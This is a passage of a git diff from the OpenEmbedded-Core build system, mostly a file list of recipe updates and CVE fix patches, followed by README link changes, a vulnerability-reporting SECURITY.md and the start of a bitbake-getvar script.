-rw-r--r--meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch52
-rw-r--r--meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch148
-rw-r--r--meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch27
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch119
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch55
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch42
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch36
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch39
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch217
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch34
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch37
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch58
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch183
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch159
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch29
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch659
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch123
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch277
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch45
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch548
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch26
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch157
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch135
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch91
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch173
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch90
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch35
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch33
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch59
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch35
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch47
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch34
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch67
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch53
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch30
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch191
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch152
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch46
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch28
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch212
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch62
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch30
-rw-r--r--meta/recipes-multimedia/libtiff/tiff_4.1.0.bb53
-rw-r--r--meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb6
-rw-r--r--meta/recipes-multimedia/pulseaudio/pulseaudio.inc7
-rw-r--r--meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch30
-rw-r--r--meta/recipes-multimedia/speex/speex_1.2.0.bb4
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-1999.patch55
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch366
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch53
-rw-r--r--meta/recipes-multimedia/webp/libwebp_1.1.0.bb6
-rw-r--r--meta/recipes-multimedia/x264/x264_git.bb2
-rw-r--r--meta/recipes-rt/rt-tests/rt-tests.inc2
-rw-r--r--meta/recipes-rt/rt-tests/rt-tests_1.1.bb3
-rw-r--r--meta/recipes-sato/images/core-image-sato-dev.bb1
-rw-r--r--meta/recipes-sato/images/core-image-sato-ptest-fast.bb4
-rw-r--r--meta/recipes-sato/images/core-image-sato-sdk-ptest.bb4
-rw-r--r--meta/recipes-sato/images/core-image-sato-sdk.bb1
-rw-r--r--meta/recipes-sato/images/core-image-sato.bb2
-rw-r--r--meta/recipes-sato/l3afpad/l3afpad_git.bb6
-rw-r--r--meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb2
-rw-r--r--meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb3
-rw-r--r--meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb1
-rw-r--r--meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb4
-rw-r--r--meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb2
-rw-r--r--meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb2
-rw-r--r--meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb2
-rw-r--r--meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb1
-rw-r--r--meta/recipes-sato/puzzles/puzzles_git.bb3
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc1
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch30
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb4
-rw-r--r--meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb2
-rw-r--r--meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb2
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch31
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch66
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch15
-rw-r--r--meta/recipes-sato/webkit/webkitgtk_2.28.4.bb (renamed from meta/recipes-sato/webkit/webkitgtk_2.28.2.bb)18
-rw-r--r--meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb3
-rw-r--r--meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch135
-rw-r--r--meta/recipes-support/apr/apr-util_1.6.3.bb (renamed from meta/recipes-support/apr/apr-util_1.6.1.bb)13
-rw-r--r--meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch20
-rw-r--r--meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch58
-rw-r--r--meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch25
-rw-r--r--meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch63
-rw-r--r--meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch76
-rw-r--r--meta/recipes-support/apr/apr/libtoolize_check.patch21
-rw-r--r--meta/recipes-support/apr/apr_1.7.2.bb (renamed from meta/recipes-support/apr/apr_1.7.0.bb)27
-rw-r--r--meta/recipes-support/argp-standalone/argp-standalone_1.3.bb1
-rw-r--r--meta/recipes-support/aspell/aspell_0.60.8.bb13
-rw-r--r--meta/recipes-support/aspell/files/CVE-2019-25051.patch101
-rw-r--r--meta/recipes-support/atk/at-spi2-atk_2.34.1.bb2
-rw-r--r--meta/recipes-support/atk/at-spi2-core_2.34.0.bb4
-rw-r--r--meta/recipes-support/atk/atk_2.34.1.bb1
-rw-r--r--meta/recipes-support/attr/acl_2.2.53.bb5
-rw-r--r--meta/recipes-support/attr/attr.inc2
-rw-r--r--meta/recipes-support/bash-completion/bash-completion_2.10.bb5
-rw-r--r--meta/recipes-support/bmap-tools/bmap-tools_3.5.bb4
-rw-r--r--meta/recipes-support/boost/boost-1.72.0.inc2
-rw-r--r--meta/recipes-support/boost/boost.inc6
-rw-r--r--meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch32
-rw-r--r--meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch24
-rw-r--r--meta/recipes-support/boost/boost/arm-intrinsics.patch55
-rw-r--r--meta/recipes-support/boost/boost_1.72.0.bb4
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch80
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch37
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch20
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch34
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates_20211016.bb (renamed from meta/recipes-support/ca-certificates/ca-certificates_20190110.bb)17
-rw-r--r--meta/recipes-support/consolekit/consolekit_0.4.6.bb2
-rw-r--r--meta/recipes-support/curl/curl/CVE-2020-8231.patch1092
-rw-r--r--meta/recipes-support/curl/curl/CVE-2020-8284.patch209
-rw-r--r--meta/recipes-support/curl/curl/CVE-2020-8285.patch260
-rw-r--r--meta/recipes-support/curl/curl/CVE-2020-8286.patch133
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22876.patch59
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22890.patch464
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22898.patch26
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22924.patch226
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22925.patch43
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch86
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22946.patch328
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22947.patch352
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-22576.patch148
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-1.patch45
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-2.patch80
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-3.patch83
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-4.patch35
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27775.patch39
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27776.patch114
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27781.patch46
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27782-1.patch363
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27782-2.patch71
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32206.patch52
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32207.patch284
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32208.patch72
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32221.patch29
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-35252.patch72
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-35260.patch68
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-43552.patch82
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-23916.patch231
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27533.patch59
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch51
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27534.patch33
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch236
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27535.patch170
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27536.patch55
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27538.patch31
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch197
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28320.patch86
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28321.patch272
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28322.patch380
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-32001.patch38
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-38545.patch148
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-38546.patch132
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-46218.patch52
-rw-r--r--meta/recipes-support/curl/curl/CVE-2024-2398.patch88
-rw-r--r--meta/recipes-support/curl/curl_7.69.1.bb59
-rw-r--r--meta/recipes-support/db/db_5.3.28.bb3
-rw-r--r--meta/recipes-support/debianutils/debianutils_4.9.1.bb5
-rw-r--r--meta/recipes-support/diffoscope/diffoscope_172.bb (renamed from meta/recipes-support/diffoscope/diffoscope_136.bb)11
-rw-r--r--meta/recipes-support/dos2unix/dos2unix_7.4.1.bb2
-rw-r--r--meta/recipes-support/enchant/enchant2_2.2.8.bb3
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch50
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch31
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch30
-rw-r--r--meta/recipes-support/fribidi/fribidi_1.0.9.bb9
-rw-r--r--meta/recipes-support/gdbm/gdbm_1.18.1.bb3
-rw-r--r--meta/recipes-support/gmp/gmp/cve-2021-43618.patch27
-rw-r--r--meta/recipes-support/gmp/gmp_6.2.0.bb1
-rw-r--r--meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb6
-rw-r--r--meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch6
-rw-r--r--meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch24
-rw-r--r--meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch44
-rw-r--r--meta/recipes-support/gnupg/gnupg/relocate.patch20
-rw-r--r--meta/recipes-support/gnupg/gnupg_2.2.27.bb (renamed from meta/recipes-support/gnupg/gnupg_2.2.20.bb)10
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch67
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch65
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch37
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch282
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch85
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch206
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch125
-rw-r--r--meta/recipes-support/gnutls/gnutls_3.6.14.bb11
-rw-r--r--meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch45
-rw-r--r--meta/recipes-support/gnutls/libtasn1_4.16.0.bb3
-rw-r--r--meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch24
-rw-r--r--meta/recipes-support/gpgme/gpgme_1.13.1.bb5
-rw-r--r--meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch24
-rw-r--r--meta/recipes-support/icu/icu_66.1.bb4
-rw-r--r--meta/recipes-support/iso-codes/iso-codes_4.4.bb5
-rw-r--r--meta/recipes-support/itstool/itstool_2.0.6.bb4
-rw-r--r--meta/recipes-support/libassuan/libassuan_2.5.3.bb3
-rw-r--r--meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb1
-rw-r--r--meta/recipes-support/libbsd/libbsd_0.10.0.bb6
-rw-r--r--meta/recipes-support/libcap/files/CVE-2023-2602.patch52
-rw-r--r--meta/recipes-support/libcap/files/CVE-2023-2603.patch58
-rw-r--r--meta/recipes-support/libcap/libcap_2.32.bb8
-rw-r--r--meta/recipes-support/libcheck/libcheck_0.14.0.bb5
-rw-r--r--meta/recipes-support/libcroco/files/CVE-2020-12825.patch192
-rw-r--r--meta/recipes-support/libcroco/libcroco_0.6.13.bb6
-rw-r--r--meta/recipes-support/libdaemon/libdaemon_0.14.bb4
-rw-r--r--meta/recipes-support/libevdev/libevdev/determinism.patch3
-rw-r--r--meta/recipes-support/libevdev/libevdev_1.8.0.bb3
-rw-r--r--meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch33
-rw-r--r--meta/recipes-support/libevent/libevent_2.1.11.bb6
-rw-r--r--meta/recipes-support/libexif/files/CVE-2020-0198.patch66
-rw-r--r--meta/recipes-support/libexif/files/CVE-2020-0452.patch39
-rw-r--r--meta/recipes-support/libexif/libexif_0.6.22.bb5
-rw-r--r--meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch104
-rw-r--r--meta/recipes-support/libffi/libffi_3.3.bb1
-rw-r--r--meta/recipes-support/libfm/libfm-extra_1.3.1.bb1
-rw-r--r--meta/recipes-support/libfm/libfm_1.3.1.bb2
-rw-r--r--meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch77
-rw-r--r--meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch109
-rw-r--r--meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb8
-rw-r--r--meta/recipes-support/libgpg-error/libgpg-error_1.37.bb1
-rw-r--r--meta/recipes-support/libical/libical_3.0.7.bb4
-rw-r--r--meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb2
-rw-r--r--meta/recipes-support/libksba/libksba/CVE-2022-3515.patch47
-rw-r--r--meta/recipes-support/libksba/libksba/CVE-2022-47629.patch69
-rw-r--r--meta/recipes-support/libksba/libksba_1.3.5.bb10
-rw-r--r--meta/recipes-support/libnl/libnl_3.5.0.bb5
-rw-r--r--meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch41
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch30
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch59
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch660
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch74
-rw-r--r--meta/recipes-support/libpcre/libpcre2_10.34.bb6
-rw-r--r--meta/recipes-support/libpcre/libpcre_8.44.bb3
-rw-r--r--meta/recipes-support/libproxy/libproxy_0.4.15.bb4
-rw-r--r--meta/recipes-support/libpsl/libpsl_0.21.0.bb13
-rw-r--r--meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb6
-rw-r--r--meta/recipes-support/libunistring/libunistring_0.9.10.bb1
-rw-r--r--meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch420
-rw-r--r--meta/recipes-support/libunwind/libunwind_1.3.1.bb1
-rw-r--r--meta/recipes-support/liburcu/liburcu_0.11.1.bb3
-rw-r--r--meta/recipes-support/libusb/libusb1_1.0.22.bb6
-rw-r--r--meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch201
-rw-r--r--meta/recipes-support/libxslt/libxslt_1.1.34.bb10
-rw-r--r--meta/recipes-support/lz4/files/CVE-2021-3520.patch27
-rw-r--r--meta/recipes-support/lz4/lz4_1.9.2.bb10
-rw-r--r--meta/recipes-support/lzo/lzo_2.10.bb4
-rw-r--r--meta/recipes-support/lzop/lzop_1.04.bb1
-rw-r--r--meta/recipes-support/mpfr/mpfr_4.0.2.bb1
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch215
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch53
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch122
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch48
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch53
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch277
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch163
-rw-r--r--meta/recipes-support/nettle/nettle_3.5.1.bb11
-rw-r--r--meta/recipes-support/npth/npth_1.6.bb1
-rw-r--r--meta/recipes-support/p11-kit/p11-kit_0.23.22.bb (renamed from meta/recipes-support/p11-kit/p11-kit_0.23.20.bb)9
-rw-r--r--meta/recipes-support/popt/popt_1.16.bb1
-rw-r--r--meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb4
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch347
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch243
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch156
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch166
-rw-r--r--meta/recipes-support/re2c/re2c_1.0.1.bb10
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch26
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch38
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch38
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/rngd.service1
-rw-r--r--meta/recipes-support/rng-tools/rng-tools_6.9.bb5
-rw-r--r--meta/recipes-support/serf/serf_1.3.9.bb10
-rw-r--r--meta/recipes-support/shared-mime-info/shared-mime-info_git.bb3
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2020-35525.patch21
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2020-35527.patch22
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2021-20223.patch23
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2022-35737.patch29
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2023-7104.patch46
-rw-r--r--meta/recipes-support/sqlite/sqlite3.inc1
-rw-r--r--meta/recipes-support/sqlite/sqlite3_3.31.1.bb7
-rw-r--r--meta/recipes-support/taglib/taglib_1.11.1.bb1
-rw-r--r--meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch13
-rw-r--r--meta/recipes-support/vim/files/disable_acl_header_check.patch15
-rw-r--r--meta/recipes-support/vim/files/no-path-adjust.patch8
-rw-r--r--meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch13
-rw-r--r--meta/recipes-support/vim/vim-tiny_9.0.bb (renamed from meta/recipes-support/vim/vim-tiny_8.2.bb)0
-rw-r--r--meta/recipes-support/vim/vim.inc49
-rw-r--r--meta/recipes-support/vim/vim_9.0.bb (renamed from meta/recipes-support/vim/vim_8.2.bb)0
-rw-r--r--meta/recipes-support/vte/vte_0.58.3.bb2
-rwxr-xr-xscripts/bitbake-whatchanged2
-rwxr-xr-xscripts/buildhistory-diff5
-rwxr-xr-xscripts/contrib/build-perf-test-wrapper.sh15
-rwxr-xr-xscripts/contrib/convert-srcuri.py77
-rwxr-xr-xscripts/contrib/documentation-audit.sh2
-rwxr-xr-xscripts/contrib/oe-build-perf-report-email.py167
-rwxr-xr-xscripts/create-pull-request2
-rwxr-xr-xscripts/git26
-rw-r--r--scripts/lib/buildstats.py4
-rw-r--r--scripts/lib/checklayer/__init__.py11
-rw-r--r--scripts/lib/checklayer/cases/common.py2
-rw-r--r--scripts/lib/devtool/deploy.py12
-rw-r--r--scripts/lib/devtool/menuconfig.py2
-rw-r--r--scripts/lib/devtool/standard.py46
-rw-r--r--scripts/lib/recipetool/create.py18
-rw-r--r--scripts/lib/resulttool/report.py5
-rw-r--r--scripts/lib/resulttool/resultutils.py8
-rw-r--r--scripts/lib/scriptutils.py10
-rw-r--r--scripts/lib/wic/engine.py6
-rw-r--r--scripts/lib/wic/help.py10
-rw-r--r--scripts/lib/wic/ksparser.py18
-rw-r--r--scripts/lib/wic/misc.py24
-rw-r--r--scripts/lib/wic/partition.py106
-rw-r--r--scripts/lib/wic/pluginbase.py8
-rw-r--r--scripts/lib/wic/plugins/imager/direct.py57
-rw-r--r--scripts/lib/wic/plugins/source/bootimg-efi.py7
-rw-r--r--scripts/lib/wic/plugins/source/bootimg-partition.py2
-rw-r--r--scripts/lib/wic/plugins/source/bootimg-pcbios.py6
-rw-r--r--scripts/lib/wic/plugins/source/rootfs.py85
-rwxr-xr-xscripts/nativesdk-intercept/chgrp27
-rwxr-xr-xscripts/nativesdk-intercept/chown27
-rwxr-xr-xscripts/oe-depends-dot21
-rwxr-xr-xscripts/oe-pkgdata-browser2
-rwxr-xr-xscripts/oe-pkgdata-util3
-rwxr-xr-xscripts/oe-run-native2
-rwxr-xr-xscripts/oe-setup-builddir4
-rw-r--r--scripts/postinst-intercepts/update_font_cache2
-rw-r--r--scripts/pybootchartgui/pybootchartgui/draw.py7
-rw-r--r--scripts/pybootchartgui/pybootchartgui/parsing.py2
-rwxr-xr-xscripts/relocate_sdk.py10
-rwxr-xr-xscripts/runqemu55
-rwxr-xr-xscripts/verify-bashisms2
-rwxr-xr-xscripts/wic8
-rwxr-xr-xscripts/yocto-check-layer28
2122 files changed, 186622 insertions, 116904 deletions
diff --git a/README.OE-Core b/README.OE-Core
index 521916cd4f..2f2127fb03 100644
--- a/README.OE-Core
+++ b/README.OE-Core
@@ -6,24 +6,24 @@ of OpenEmbedded. It is distro-less (can build a functional image with
DISTRO = "nodistro") and contains only emulated machine support.
For information about OpenEmbedded, see the OpenEmbedded website:
- http://www.openembedded.org/
+ https://www.openembedded.org/
The Yocto Project has extensive documentation about OE including a reference manual
which can be found at:
- http://yoctoproject.org/documentation
+ https://docs.yoctoproject.org/
Contributing
------------
Please refer to
-http://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded
+https://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded
for guidelines on how to submit patches.
Mailing list:
- http://lists.openembedded.org/mailman/listinfo/openembedded-core
+ https://lists.openembedded.org/g/openembedded-core
Source code:
- http://git.openembedded.org/openembedded-core/
+ https://git.openembedded.org/openembedded-core/
diff --git a/SECURITY.md b/SECURITY.md
new file mode 100644
index 0000000000..7d2ce1f631
--- /dev/null
+++ b/SECURITY.md
@@ -0,0 +1,24 @@
+How to Report a Potential Vulnerability?
+========================================
+
+If you would like to report a public issue (for example, one with a released
+CVE number), please report it using the
+[https://bugzilla.yoctoproject.org/enter_bug.cgi?product=Security Security Bugzilla].
+If you have a patch ready, submit it following the same procedure as any other
+patch as described in README.md.
+
+If you are dealing with a not-yet released or urgent issue, please send a
+message to security AT yoctoproject DOT org, including as many details as
+possible: the layer or software module affected, the recipe and its version,
+and any example code, if available.
+
+Branches maintained with security fixes
+---------------------------------------
+
+See [https://wiki.yoctoproject.org/wiki/Stable_Release_and_LTS Stable release and LTS]
+for detailed info regarding the policies and maintenance of Stable branches.
+
+The [https://wiki.yoctoproject.org/wiki/Releases Release page] contains a list of all
+releases of the Yocto Project. Versions in grey are no longer actively maintained with
+security patches, but well-tested patches may still be accepted for them for
+significant issues.
diff --git a/bitbake/SECURITY.md b/bitbake/SECURITY.md
new file mode 100644
index 0000000000..7d2ce1f631
--- /dev/null
+++ b/bitbake/SECURITY.md
@@ -0,0 +1,24 @@
+How to Report a Potential Vulnerability?
+========================================
+
+If you would like to report a public issue (for example, one with a released
+CVE number), please report it using the
+[https://bugzilla.yoctoproject.org/enter_bug.cgi?product=Security Security Bugzilla].
+If you have a patch ready, submit it following the same procedure as any other
+patch as described in README.md.
+
+If you are dealing with a not-yet released or urgent issue, please send a
+message to security AT yoctoproject DOT org, including as many details as
+possible: the layer or software module affected, the recipe and its version,
+and any example code, if available.
+
+Branches maintained with security fixes
+---------------------------------------
+
+See [https://wiki.yoctoproject.org/wiki/Stable_Release_and_LTS Stable release and LTS]
+for detailed info regarding the policies and maintenance of Stable branches.
+
+The [https://wiki.yoctoproject.org/wiki/Releases Release page] contains a list of all
+releases of the Yocto Project. Versions in grey are no longer actively maintained with
+security patches, but well-tested patches may still be accepted for them for
+significant issues.
diff --git a/bitbake/bin/bitbake-getvar b/bitbake/bin/bitbake-getvar
new file mode 100755
index 0000000000..9423219253
--- /dev/null
+++ b/bitbake/bin/bitbake-getvar
@@ -0,0 +1,48 @@
+#! /usr/bin/env python3
+#
+# Copyright (C) 2021 Richard Purdie
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+import argparse
+import io
+import os
+import sys
+
+bindir = os.path.dirname(__file__)
+topdir = os.path.dirname(bindir)
+sys.path[0:0] = [os.path.join(topdir, 'lib')]
+
+import bb.tinfoil
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser(description="Bitbake Query Variable")
